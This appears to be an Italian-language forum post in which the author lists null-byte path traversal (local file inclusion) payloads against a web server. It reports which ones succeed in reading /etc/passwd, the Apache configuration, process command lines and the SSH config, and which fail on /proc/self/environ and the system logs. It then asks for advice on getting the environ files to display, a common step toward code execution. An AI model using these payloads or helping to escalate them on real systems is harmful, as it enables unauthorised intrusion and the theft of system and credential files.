Cosa farebbe su una macchina per interrompere un'iniezione di byte null visualizzando l'output di /proc/self/environ
e /proc/$PID/environ
o /proc/$PID/fd/12
?
In base a questo articolo, tutte le cartelle in /proc
dovrebbero avere le autorizzazioni per l'utente che esegue il servizio ... quindi l'iniezione tramite byte null avviene sotto l'utente www-data corretta?
Output visibili visualizzati su
../../../../../../etc/passwd%00 {output passwd file}
../../../../../../etc/httpd/conf/httpd.conf%00 {output apache config}
../../../../../../etc/httpd/run/httpd.pid%00 {PID of httpd process}
../../../../../../proc/$PID/cmdline%00 {cmd line executed to run httpd}
../../../../../../etc/ssh/ssh_config%00 {ssh config file}
Non riceve l'output da:
../../../../../../var/log/messages%00
../../../../../../var/log/secure%00
../../../../../../proc/self/environ%00
../../../../../../proc/$PID/environ%00
Qualche consiglio sarebbe fantastico.